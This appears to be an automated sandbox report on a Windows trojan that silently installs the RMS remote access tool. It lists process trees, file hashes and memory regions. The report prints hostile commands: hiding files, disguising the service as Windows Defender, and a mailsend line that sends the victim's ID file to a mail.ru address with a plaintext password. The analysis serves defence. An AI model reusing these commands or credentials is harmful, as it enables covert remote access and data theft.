Overview

overview

10

Static

static

3

92cc670966...18.exe

windows7-x64

10

92cc670966...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    03-06-2024 22:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    92cc670966533412a28905554e3ffd17_JaffaCakes118.exe

  • Size

    4.6MB

  • MD5

    92cc670966533412a28905554e3ffd17

  • SHA1

    811d7fe266fa3412233eb3c03f7261020c22a39a

  • SHA256

    6b1993fe3607e7903ec2eb3c28325a33bf9dd7f0e10dced73127d67e59e2c190

  • SHA512

    22237b3e13b0957615081faf79e15bc9a1632202273e7754f5fcfb3da0e9c057d107a2b70a5aa5bf7c5572aa31be157e801582dfc4b0ad1a67608c0c462570bf

  • SSDEEP

    98304:lKxQ7KQF1iEaGzM038RzYf0ML2x5tTDaLclizt5CZ:lx7KQrLM/RzYI7Da4Ii

Score
10/10
rmsaspackv2evasionrattrojanupx

Malware Config

Signatures

  • RMS

    Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.

    trojanratrms
  • Sets file to hidden 1 TTPs 2 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

    evasion
  • ACProtect 1.3x - 1.4x DLL software 2 IoCs

    Detects file using ACProtect software.

  • ASPack v2.12-2.42 2 IoCs

    Detects executables packed with ASPack v2.12-2.42

    aspackv2
  • Executes dropped EXE 8 IoCs
  • Loads dropped DLL 7 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 35 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 3 IoCs
    evasion
  • Kills process with taskkill 4 IoCs
    evasion
  • Runs .reg file with regedit 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 7 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\92cc670966533412a28905554e3ffd17_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\92cc670966533412a28905554e3ffd17_JaffaCakes118.exe"
    1⤵
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:1824
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\System\install.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2596
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Program Files (x86)\System\install.bat" "
        3⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2908
        • C:\Windows\SysWOW64\attrib.exe
          attrib "C:\Program Files (x86)\System" +H +S /S /D
          4⤵
          • Sets file to hidden
          • Drops file in Program Files directory
          • Views/modifies file attributes
          PID:2592
        • C:\Windows\SysWOW64\attrib.exe
          attrib "C:\Program Files (x86)\System\*.*" +H +S /S /D
          4⤵
          • Sets file to hidden
          • Drops file in Program Files directory
          • Views/modifies file attributes
          PID:2740
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im rutserv.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2652
        • C:\Windows\SysWOW64\taskkill.exe
          Taskkill /f /im rutserv.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2636
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im rfusclient.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2468
        • C:\Windows\SysWOW64\taskkill.exe
          Taskkill /f /im rfusclient.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2528
        • C:\Windows\SysWOW64\reg.exe
          reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
          4⤵
            PID:2340
          • C:\Windows\SysWOW64\regedit.exe
            regedit /s "regedit.reg"
            4⤵
            • Runs .reg file with regedit
            PID:1976
          • C:\Windows\SysWOW64\timeout.exe
            timeout 2
            4⤵
            • Delays execution with timeout.exe
            PID:1228
          • C:\Program Files (x86)\System\rutserv.exe
            rutserv.exe /silentinstall
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:904
          • C:\Program Files (x86)\System\rutserv.exe
            rutserv.exe /firewall
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            PID:2780
          • C:\Program Files (x86)\System\rutserv.exe
            rutserv.exe /start
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:1260
          • C:\Windows\SysWOW64\sc.exe
            sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
            4⤵
            • Launches sc.exe
            PID:1528
          • C:\Windows\SysWOW64\sc.exe
            sc config RManService obj= LocalSystem type= interact type= own
            4⤵
            • Launches sc.exe
            PID:1916
          • C:\Windows\SysWOW64\sc.exe
            sc config RManService DisplayName= "Windows_Defender v6.3"
            4⤵
            • Launches sc.exe
            PID:2560
          • C:\Windows\SysWOW64\timeout.exe
            timeout 120
            4⤵
            • Delays execution with timeout.exe
            PID:1800
          • C:\Windows\SysWOW64\reg.exe
            reg export "HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4" "id.txt"
            4⤵
            • Drops file in Program Files directory
            PID:2652
          • C:\Windows\SysWOW64\timeout.exe
            timeout 10
            4⤵
            • Delays execution with timeout.exe
            PID:2636
          • C:\Program Files (x86)\System\mailsend.exe
            mailsend.exe -t [email protected] -attach id.txt,application/txt -sub "RMS" -smtp smtp.mail.ru -port 465 -f [email protected] -name "RMS" -ssl -auth-login -user [email protected] -pass Xidgs6dgd8ds -q
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:2536
          • C:\Windows\SysWOW64\attrib.exe
            attrib "C:\Program Files (x86)\System\regedit.reg" -S -H /S /D
            4⤵
            • Drops file in Program Files directory
            • Views/modifies file attributes
            PID:1224
          • C:\Windows\SysWOW64\attrib.exe
            attrib "C:\Program Files (x86)\System\mailsend.exe" -S -H /S /D
            4⤵
            • Drops file in Program Files directory
            • Views/modifies file attributes
            PID:1200
          • C:\Windows\SysWOW64\attrib.exe
            attrib "C:\Program Files (x86)\System\id.txt" -S -H /S /D
            4⤵
            • Drops file in Program Files directory
            • Views/modifies file attributes
            PID:1736
          • C:\Windows\SysWOW64\attrib.exe
            attrib "C:\Program Files (x86)\System\install.vbs" -S -H /S /D
            4⤵
            • Drops file in Program Files directory
            • Views/modifies file attributes
            PID:2732
          • C:\Windows\SysWOW64\attrib.exe
            attrib "C:\Program Files (x86)\System\install.bat" -S -H /S /D
            4⤵
            • Drops file in Program Files directory
            • Views/modifies file attributes
            PID:2564
    • C:\Program Files (x86)\System\rutserv.exe
      "C:\Program Files (x86)\System\rutserv.exe"
      1⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:1536
      • C:\Program Files (x86)\System\rfusclient.exe
        "C:\Program Files (x86)\System\rfusclient.exe" /tray
        2⤵
        • Executes dropped EXE
        PID:2368
      • C:\Program Files (x86)\System\rfusclient.exe
        "C:\Program Files (x86)\System\rfusclient.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        PID:340
        • C:\Program Files (x86)\System\rfusclient.exe
          "C:\Program Files (x86)\System\rfusclient.exe" /tray
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: SetClipboardViewer
          PID:764

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Program Files (x86)\System\id.txt
      Filesize

      20KB

      MD5

      6e241090254efb1f27dc8cb4f6a195b7

      SHA1

      96098523409bef031dd0a163778686162b59a5b4

      SHA256

      36e682d26f18639a9b8147874ff30e5dc194652fba92342fc9d726cc1c2a9af8

      SHA512

      c25ddb5f1809f4a638bff419c219257aed306d7a4ff18dce13d602c01876d5a02f7bc37a2f3b67033962977860804c3f4ce40862da718ede8102e950d003d90a

      Download Submit

    • C:\Program Files (x86)\System\install.bat
      Filesize

      1KB

      MD5

      c72b5dc3c2dfd52e041e8192a6c285fc

      SHA1

      c972e668ea60467a0dd745b7d6cd8a4c1f59f80b

      SHA256

      8eaa5b6c5b32c10af614f11c78e3df59949642a06b2062d14edd21cb8cb7a381

      SHA512

      fb4a49306fceffdfadd5b4d58b81fb286d3e867b759b3e90a98a97c7d9ba606c86067ff7e7ef73c72aaafc1cb99912125ecbe7d496b8141816c5f58ed87cf557

      Download Submit

    • C:\Program Files (x86)\System\install.vbs
      Filesize

      120B

      MD5

      c719a030434d3fa96d62868f27e904a6

      SHA1

      f2f750a752dd1fda8915a47b082af7cf2d3e3655

      SHA256

      2696ee4302a85c6b4101fc6d1ce8e38b94fd9c2bbd1acc73b553576b3aacb92f

      SHA512

      47a9367f7596d19c0636766cd34ca3701d3b1239a284f2333fd04a48422f53b0df21002fd38a4f229f6a2f9f9e8163267e13ecb24d9ce6de1863d5f59ab04ff0

      Download Submit

    • C:\Program Files (x86)\System\mailsend.exe
      Filesize

      1.2MB

      MD5

      ac23b87f8ec60ddd3f555556f89a6af8

      SHA1

      3cea6f84757d15ee8d7fa19d3dfc4992c50aa90c

      SHA256

      80a1d0a15066c7af67cf5377e59e450c2a96018505236f8f3352173282b27ae4

      SHA512

      57e67eab9c2a3b94161500eb0091533a539454e9bfddd47c61477299de9455b7ca11c498c5d8a7d77f4763a2053acb4ff96868a9313fede29969edc16d35b167

      Download Submit

    • C:\Program Files (x86)\System\regedit.reg
      Filesize

      12KB

      MD5

      251212852a073e6fc5fbe3af92f66adb

      SHA1

      6ee07cb20f57830325c11867e68fea49ae0e87ea

      SHA256

      f2c83f4cc13b0cd28090dd128ec5ff221681118f6100eddaead88526070ceecb

      SHA512

      f3853ece99edc6d39edbf1c7bca471e71aa034684a85358b033e50418ffa061f1e8724cba76065048901c20c9f9a6dbd86a17ee33756c0452d4d3358047296be

      Download Submit

    • C:\Program Files (x86)\System\rfusclient.exe
      Filesize

      1.5MB

      MD5

      b8667a1e84567fcf7821bcefb6a444af

      SHA1

      9c1f91fe77ad357c8f81205d65c9067a270d61f0

      SHA256

      dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9

      SHA512

      ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

      Download Submit

    • C:\Program Files (x86)\System\rutserv.exe
      Filesize

      1.7MB

      MD5

      37a8802017a212bb7f5255abc7857969

      SHA1

      cb10c0d343c54538d12db8ed664d0a1fa35b6109

      SHA256

      1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

      SHA512

      4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

      Download Submit

    • C:\Program Files (x86)\System\vp8decoder.dll
      Filesize

      155KB

      MD5

      88318158527985702f61d169434a4940

      SHA1

      3cc751ba256b5727eb0713aad6f554ff1e7bca57

      SHA256

      4c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74

      SHA512

      5d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff

      Download Submit

    • C:\Program Files (x86)\System\vp8encoder.dll
      Filesize

      593KB

      MD5

      6298c0af3d1d563834a218a9cc9f54bd

      SHA1

      0185cd591e454ed072e5a5077b25c612f6849dc9

      SHA256

      81af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172

      SHA512

      389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe

      Download Submit

    • memory/340-70-0x0000000000400000-0x00000000009B6000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/340-74-0x0000000000400000-0x00000000009B6000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/340-73-0x0000000000400000-0x00000000009B6000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/340-72-0x0000000000400000-0x00000000009B6000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/340-71-0x0000000000400000-0x00000000009B6000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/340-87-0x0000000000400000-0x00000000009B6000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/340-69-0x0000000000400000-0x00000000009B6000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/764-95-0x0000000000400000-0x00000000009B6000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/764-89-0x0000000000400000-0x00000000009B6000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/764-91-0x0000000000400000-0x00000000009B6000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/764-92-0x0000000000400000-0x00000000009B6000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/764-93-0x0000000000400000-0x00000000009B6000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/764-88-0x0000000000400000-0x00000000009B6000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/764-90-0x0000000000400000-0x00000000009B6000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/904-29-0x0000000000400000-0x0000000000AB9000-memory.dmp

      Filesize

      6.7MB

      Download

    • memory/904-30-0x0000000000400000-0x0000000000AB9000-memory.dmp

      Filesize

      6.7MB

      Download

    • memory/904-31-0x0000000000400000-0x0000000000AB9000-memory.dmp

      Filesize

      6.7MB

      Download

    • memory/904-34-0x0000000000400000-0x0000000000AB9000-memory.dmp

      Filesize

      6.7MB

      Download

    • memory/904-35-0x0000000000400000-0x0000000000AB9000-memory.dmp

      Filesize

      6.7MB

      Download

    • memory/904-33-0x0000000000400000-0x0000000000AB9000-memory.dmp

      Filesize

      6.7MB

      Download

    • memory/904-32-0x0000000000400000-0x0000000000AB9000-memory.dmp

      Filesize

      6.7MB

      Download

    • memory/1260-52-0x0000000000400000-0x0000000000AB9000-memory.dmp

      Filesize

      6.7MB

      Download

    • memory/1260-54-0x0000000000400000-0x0000000000AB9000-memory.dmp

      Filesize

      6.7MB

      Download

    • memory/1260-50-0x0000000000400000-0x0000000000AB9000-memory.dmp

      Filesize

      6.7MB

      Download

    • memory/1260-51-0x0000000000400000-0x0000000000AB9000-memory.dmp

      Filesize

      6.7MB

      Download

    • memory/1260-53-0x0000000000400000-0x0000000000AB9000-memory.dmp

      Filesize

      6.7MB

      Download

    • memory/1260-75-0x0000000000400000-0x0000000000AB9000-memory.dmp

      Filesize

      6.7MB

      Download

    • memory/1260-55-0x0000000000400000-0x0000000000AB9000-memory.dmp

      Filesize

      6.7MB

      Download

    • memory/1536-65-0x0000000003850000-0x0000000003E06000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/1536-84-0x0000000000400000-0x0000000000AB9000-memory.dmp

      Filesize

      6.7MB

      Download

    • memory/1536-57-0x0000000000400000-0x0000000000AB9000-memory.dmp

      Filesize

      6.7MB

      Download

    • memory/1536-58-0x0000000000400000-0x0000000000AB9000-memory.dmp

      Filesize

      6.7MB

      Download

    • memory/1536-114-0x0000000000400000-0x0000000000AB9000-memory.dmp

      Filesize

      6.7MB

      Download

    • memory/1536-107-0x0000000000400000-0x0000000000AB9000-memory.dmp

      Filesize

      6.7MB

      Download

    • memory/1536-103-0x0000000000400000-0x0000000000AB9000-memory.dmp

      Filesize

      6.7MB

      Download

    • memory/1536-100-0x0000000000400000-0x0000000000AB9000-memory.dmp

      Filesize

      6.7MB

      Download

    • memory/1536-68-0x0000000003850000-0x0000000003E06000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/1536-59-0x0000000000400000-0x0000000000AB9000-memory.dmp

      Filesize

      6.7MB

      Download

    • memory/1536-60-0x0000000000400000-0x0000000000AB9000-memory.dmp

      Filesize

      6.7MB

      Download

    • memory/1536-62-0x0000000000400000-0x0000000000AB9000-memory.dmp

      Filesize

      6.7MB

      Download

    • memory/1536-61-0x0000000000400000-0x0000000000AB9000-memory.dmp

      Filesize

      6.7MB

      Download

    • memory/1536-96-0x0000000000400000-0x0000000000AB9000-memory.dmp

      Filesize

      6.7MB

      Download

    • memory/2368-98-0x0000000000400000-0x00000000009B6000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/2368-76-0x0000000000400000-0x00000000009B6000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/2368-86-0x0000000000400000-0x00000000009B6000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/2368-115-0x0000000000400000-0x00000000009B6000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/2368-80-0x0000000000400000-0x00000000009B6000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/2368-108-0x0000000000400000-0x00000000009B6000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/2368-79-0x0000000000400000-0x00000000009B6000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/2368-78-0x0000000000400000-0x00000000009B6000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/2368-77-0x0000000000400000-0x00000000009B6000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/2780-42-0x0000000000400000-0x0000000000AB9000-memory.dmp

      Filesize

      6.7MB

      Download

    • memory/2780-40-0x0000000000400000-0x0000000000AB9000-memory.dmp

      Filesize

      6.7MB

      Download

    • memory/2780-43-0x0000000000400000-0x0000000000AB9000-memory.dmp

      Filesize

      6.7MB

      Download

    • memory/2780-41-0x0000000000400000-0x0000000000AB9000-memory.dmp

      Filesize

      6.7MB

      Download

    • memory/2780-44-0x0000000000400000-0x0000000000AB9000-memory.dmp

      Filesize

      6.7MB

      Download

    • memory/2780-39-0x0000000000400000-0x0000000000AB9000-memory.dmp

      Filesize

      6.7MB

      Download

    • memory/2780-46-0x0000000000400000-0x0000000000AB9000-memory.dmp

      Filesize

      6.7MB

      Download

    • memory/2908-49-0x0000000002580000-0x0000000002C39000-memory.dmp

      Filesize

      6.7MB

      Download

    • memory/2908-37-0x0000000002580000-0x0000000002C39000-memory.dmp

      Filesize

      6.7MB

      Download

    • memory/2908-28-0x0000000002580000-0x0000000002C39000-memory.dmp

      Filesize

      6.7MB

      Download